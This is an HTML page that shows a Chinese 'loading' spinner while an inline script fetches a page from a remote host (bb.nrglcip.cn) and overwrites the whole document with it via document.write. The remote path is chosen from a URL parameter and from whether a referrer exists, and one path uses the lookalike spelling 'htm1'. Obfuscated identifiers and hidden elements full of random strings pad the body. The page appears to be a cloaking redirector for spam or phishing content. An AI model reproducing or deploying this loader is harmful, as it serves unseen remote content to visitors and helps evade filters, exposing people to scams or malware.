<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .q4SSaS {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .q4SSaS .iMlsK9el {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .q4SSaS .content {
            line-height: 50px;
            text-align: center
        }

        .q4SSaS .img {
            width: 100%
        }

        .q4SSaS .sIiijC {
            text-align: center
        }

        .q4SSaS .sIiijC span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .q4SSaS .sIiijC span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .q4SSaS .sIiijC span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .q4SSaS .sIiijC span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .q4SSaS .sIiijC span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .q4SSaS .sIiijC span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .q4SSaS .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function IllRyueNyoa(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var JRdGi7d = IllRyueNyoa('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ JRdGi7d +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ JRdGi7d +".html?a=share";
		}
		
        DIGVyVLKVt=url+"#"+new Date().getTime();
        DIGVyVLKVt && function() {
            $.get(DIGVyVLKVt, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<h1 style='display:none' >akruf2x1Pws5yqmQvKNdMMPF6ep4y7MK7iaRWhBL</h1>
<p  style='display:none'>VoWVS5NT8W24yTgVRzBSRbpXQZDYitdGEMqLzDn2FGBSZ2D6sueEBbzNVmMnHrVFlABp61mZuL6ST8</p>
<b style='display:none' >F0KDxm5jmpzAEhnu03jK7thZco7fWlRvo9EEFhqOJU0Q5wC</b>
<p  style='display:none'>VoWVS5NT8W24yTgVRzBSRbpXQZDYitdGEMqLzDn2FGBSZ2D6sueEBbzNVmMnHrVFlABp61mZuL6ST8</p>
<span style='display:none'>I3inDdNmHCF1wgeQtsHA1GdcXQerpfQjIjiEAui0tFlVGd</span><div class="q4SSaS">
    <div class="iMlsK9el">
        <div class="sIiijC">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>QKJFszkqQ49ROjuWWVBr</div>
<h1 style='display:none' >U8cTAF2sT7pMKGgW</h1>
<ul style='display:none' >urhzqY1kD7f1e5</ul>
<b style='display:none' >suCHD7hDDMyLEgxKt9oHw19QZ</b>
<li style='display:none' >Do36Kvr03dEWG8Boorp1JCRtK6l4fH1DsR6EAVjgtoaHalI6lUnsLoP28vd4S2N3GPOoGAE9QqPY52rsMJxttNvU8t7i</li>
<div style='display:none'>QKJFszkqQ49ROjuWWVBr</div>
<ul style='display:none' >urhzqY1kD7f1e5</ul>
<b style='display:none' >suCHD7hDDMyLEgxKt9oHw19QZ</b>
<span style='display:none'>WKrnLEO3N1eYv9</span></body>
</html>